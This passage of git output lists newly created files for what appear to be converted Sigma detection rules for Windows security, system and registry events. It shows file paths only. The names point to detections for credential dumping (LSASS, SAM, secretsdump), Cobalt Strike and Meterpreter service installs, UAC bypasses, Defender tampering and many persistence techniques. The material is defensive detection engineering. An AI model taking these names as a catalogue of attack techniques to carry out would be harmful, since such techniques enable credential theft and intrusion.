tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_hide_file.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_hide_function_user.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_hide_scheduled_task_via_index_tamper.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_ie_security_zone_protocol_defaults_downgrade.yml create mode 100644 
tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_ime_non_default_extension.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_ime_suspicious_paths.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_install_root_or_ca_certificat.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_internet_explorer_disable_first_run_customize.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_legalnotice_susp_message.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_lsa_disablerestrictedadmin.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_lsass_usermode_dumping.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_mal_adwind.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_mal_blue_mockingbird.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_net_cli_ngenassemblyusagelog.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_netsh_help_dll_persistence_susp_location.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_netsh_helper_dll_potential_persistence.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_new_application_appcompat.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_new_network_provider.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_odbc_driver_registered.yml create mode 100644 
tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_odbc_driver_registered_susp.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_office_access_vbom_tamper.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_office_disable_protected_view_features.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_office_enable_dde.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_office_outlook_enable_load_macro_provider_on_boot.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_office_outlook_enable_macro_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_office_outlook_enable_unsafe_client_mail_rules.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_office_outlook_security_settings.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_office_trust_record_susp_location.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_office_trusted_location_uncommon.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_office_vba_warnings_tamper.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_app_cpmpat_layer_registerapprestart.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_app_paths.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_appx_debugger.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_autodial_dll.yml create mode 100644 
tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_chm.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_comhijack_psfactorybuffer.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_custom_protocol_handler.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_event_viewer_events_asp.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_globalflags.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_ie.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_ifilter.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_lsa_extension.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_mpnotify.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_mycomputer.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_natural_language.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_office_vsto.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_outlook_homepage.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_outlook_todaypage.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_reflectdebugger.yml create mode 100644 
tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_scrobj_dll.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_search_order.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_shim_database.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_shim_database_susp_application.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_shim_database_uncommon_location.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_typed_paths.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_xll.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_policies_associations_tamper.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_policies_attachments_tamper.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_powershell_as_service.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_powershell_enablescripts_enabled.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_powershell_execution_policy.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_powershell_in_run_keys.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_powershell_logging_disabled.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_provisioning_command_abuse.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_renamed_sysinternals_eula_accepted.yml create mode 100644 
tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_rpcrt4_etw_tamper.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_servicedll_hijack.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_services_etw_tamper.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_set_nopolicies_user.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_sip_persistence.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_sophos_av_tamper.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_special_accounts.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_suppress_defender_notifications.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_susp_keyboard_layout_load.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_susp_pendingfilerenameoperations.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_susp_printer_driver.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_susp_reg_persist_explorer_run.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_susp_run_key_img_folder.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_susp_service_installed.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_susp_user_shell_folders.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_suspicious_env_variables.yml create 
mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_system_lsa_nolmhash.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_taskcache_entry.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_telemetry_persistence.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_terminal_server_suspicious.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_terminal_server_tampering.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_timeproviders_dllname.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_tls_protocol_old_version_enabled.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_treatas_persistence.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_turn_on_dev_features.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_uac_bypass_eventvwr.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_uac_bypass_sdclt.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_uac_bypass_winsat.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_uac_bypass_wmp.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_vbs_payload_stored.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_wab_dllpath_reg_change.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_windows_defender_tamper.yml create mode 
100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_winget_admin_settings_tampering.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_winget_enable_local_manifest.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_winlogon_notify_key.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/account_management/win_security_access_token_abuse.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/account_management/win_security_admin_rdp_login.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/account_management/win_security_diagtrack_eop_default_login_username.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/account_management/win_security_member_added_security_enabled_global_group.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/account_management/win_security_member_removed_security_enabled_global_group.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/account_management/win_security_overpass_the_hash.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/account_management/win_security_pass_the_hash_2.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/account_management/win_security_rdp_bluekeep_poc_scanner.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/account_management/win_security_rdp_localhost_login.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/account_management/win_security_scrcons_remote_wmi_scripteventconsumer.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/account_management/win_security_security_enabled_global_group_deleted.yml create mode 100644 
tools/sigmac/converted_rules/builtin/security/account_management/win_security_successful_external_remote_rdp_login.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/account_management/win_security_successful_external_remote_smb_login.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/account_management/win_security_susp_failed_logon_source.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/account_management/win_security_susp_krbrelayup.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/account_management/win_security_susp_logon_newcredentials.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/account_management/win_security_susp_rottenpotato.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/account_management/win_security_susp_wmi_login.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/object_access/win_security_wfp_endpoint_agent_blocked.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_aadhealth_mon_agent_regkey_access.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_aadhealth_svc_agent_regkey_access.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_account_backdoor_dcsync_rights.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_account_discovery.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_ad_object_writedac_access.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_ad_replication_non_machine_account.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_ad_user_enumeration.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability.yml create mode 100644 
tools/sigmac/converted_rules/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability_eku.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_add_remove_computer.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_admin_share_access.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_alert_active_directory_user_control.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_alert_ad_user_backdoors.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_alert_enable_weak_encryption.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_alert_ruler.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_atsvc_task.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_audit_log_cleared.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_camera_microphone_access.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_cobaltstrike_service_installs.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_codeintegrity_check_failure.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_dce_rpc_smb_spoolss_named_pipe.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_dcom_iertutil_dll_hijack.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_dcsync.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_device_installation_blocked.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_disable_event_auditing.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_disable_event_auditing_critical.yml create mode 100644 
tools/sigmac/converted_rules/builtin/security/win_security_dot_net_etw_tamper.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_dpapi_domain_backupkey_extraction.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_dpapi_domain_masterkey_backup_attempt.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_external_device.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_gpo_scheduledtasks.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_hidden_user_creation.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_hktl_nofilter.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_hybridconnectionmgr_svc_installation.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_impacket_psexec.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_impacket_secretdump.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_invoke_obfuscation_clip_services_security.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_invoke_obfuscation_obfuscated_iex_services_security.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_invoke_obfuscation_stdin_services_security.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_invoke_obfuscation_var_services_security.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_invoke_obfuscation_via_compress_services_security.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_invoke_obfuscation_via_rundll_services_security.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_invoke_obfuscation_via_stdin_services_security.yml create mode 100644 
tools/sigmac/converted_rules/builtin/security/win_security_invoke_obfuscation_via_use_clip_services_security.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_invoke_obfuscation_via_use_mshta_services_security.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_invoke_obfuscation_via_use_rundll32_services_security.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_invoke_obfuscation_via_var_services_security.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_iso_mount.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_lm_namedpipe.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_lsass_access_non_system_account.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_mal_creddumper.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_mal_service_installs.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_mal_wceaux_dll.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_metasploit_authentication.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_metasploit_or_impacket_smb_psexec_service_install.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_net_ntlm_downgrade.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_net_share_obj_susp_desktop_ini.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_new_or_renamed_user_account_with_dollar_sign.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_not_allowed_rdp_access.yml create mode 100644 
tools/sigmac/converted_rules/builtin/security/win_security_password_policy_enumerated.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_pcap_drivers.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_petitpotam_network_share.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_petitpotam_susp_tgt_request.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_possible_dc_shadow.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_powershell_script_installed_as_service.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_protected_storage_service_access.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_rdp_reverse_tunnel.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_register_new_logon_process_by_rubeus.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_registry_permissions_weakness_check.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_remote_powershell_session.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_replay_attack_detected.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_sam_registry_hive_handle_request.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_scm_database_handle_failure.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_scm_database_privileged_operation.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_service_install_remote_access_software.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_service_installation_by_unusal_client.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_smb_file_creation_admin_shares.yml create mode 
100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_add_domain_trust.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_add_sid_history.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_computer_name.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_dsrm_password_change.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_failed_logon_reasons.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_kerberos_manipulation.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_ldap_dataexchange.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_local_anon_logon_created.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_logon_explicit_credentials.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_lsass_dump.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_lsass_dump_generic.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_net_recon_activity.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_opened_encrypted_zip.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_opened_encrypted_zip_filename.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_opened_encrypted_zip_outlook.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_outbound_kerberos_connection.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_possible_shadow_credentials_added.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_psexec.yml create mode 100644 
tools/sigmac/converted_rules/builtin/security/win_security_susp_raccess_sensitive_fext.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_rc4_kerberos.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_scheduled_task_creation.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_scheduled_task_delete_or_disable.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_scheduled_task_update.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_sdelete.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_time_modification.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_svcctl_remote_service.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_syskey_registry_access.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_sysmon_channel_reference_deletion.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_tap_driver_installation.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_teams_suspicious_objectaccess.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_transf_files_with_cred_data_via_network_shares.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_user_added_to_local_administrators.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_user_creation.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_user_driver_loaded.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_user_logoff.yml create mode 100644 
tools/sigmac/converted_rules/builtin/security/win_security_vssaudit_secevent_source_registration.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_windows_defender_exclusions_registry_modified.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_windows_defender_exclusions_write_access.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_windows_defender_exclusions_write_deleted.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_wmi_persistence.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_wmiprvse_wbemcomn_dll_hijack.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_workstation_was_locked.yml create mode 100644 tools/sigmac/converted_rules/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml create mode 100644 tools/sigmac/converted_rules/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml create mode 100644 tools/sigmac/converted_rules/builtin/servicebus/win_hybridconnectionmgr_svc_running.yml create mode 100644 tools/sigmac/converted_rules/builtin/shell_core/win_shell_core_susp_packages_installed.yml create mode 100644 tools/sigmac/converted_rules/builtin/smbclient/security/win_smbclient_security_susp_failed_guest_logon.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/application_popup/win_system_application_sysmon_crash.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/lsasrv/win_system_lsasrv_ntlmv1.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/microsoft_windows_dhcp_server/win_system_susp_dhcp_config.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/microsoft_windows_dhcp_server/win_system_susp_dhcp_config_failed.yml create mode 100644 
tools/sigmac/converted_rules/builtin/system/microsoft_windows_directory_services_sam/win_system_exploit_cve_2021_42287.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/microsoft_windows_distributed_com/win_system_lpe_indicators_tabtip.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/microsoft_windows_eventlog/win_system_eventlog_cleared.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/microsoft_windows_eventlog/win_system_susp_eventlog_cleared.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/microsoft_windows_kerberos_key_distribution_center/win_system_kdcsvc_cert_use_no_strong_mapping.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/microsoft_windows_kerberos_key_distribution_center/win_system_kdcsvc_rc4_downgrade.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/microsoft_windows_kernel_general/win_system_quarkspwdump_clearing_hive_access_history.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/microsoft_windows_kernel_general/win_system_susp_sam_dump.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/microsoft_windows_ntfs/win_system_volume_shadow_copy_mount.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/microsoft_windows_user_profiles_service/win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/microsoft_windows_windows_update_client/win_system_susp_system_update_error.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/netlogon/win_system_possible_zerologon_exploitation_using_wellknown_tools.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/netlogon/win_system_vul_cve_2020_1472.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/ntfs/win_system_ntfs_vuln_exploit.yml create mode 100644 
tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_cobaltstrike_service_installs.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_defender_disabled.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_hack_smbexec.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_invoke_obfuscation_clip_services.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_invoke_obfuscation_obfuscated_iex_services.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_invoke_obfuscation_stdin_services.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_invoke_obfuscation_var_services.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_compress_services.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_rundll_services.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_stdin_services.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_clip_services.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_mshta_services.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_rundll32_services.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_var_services.yml create mode 100644 
tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_krbrelayup_service_installation.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_mal_creddumper.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_moriya_rootkit.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_powershell_script_installed_as_service.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_service_install_anydesk.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_service_install_csexecsvc.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_service_install_hacktools.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_service_install_mesh_agent.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_service_install_netsupport_manager.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_service_install_paexec.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_service_install_pdqdeploy.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_service_install_pdqdeploy_runner.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_service_install_pua_proceshacker.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_service_install_remcom.yml create mode 100644 
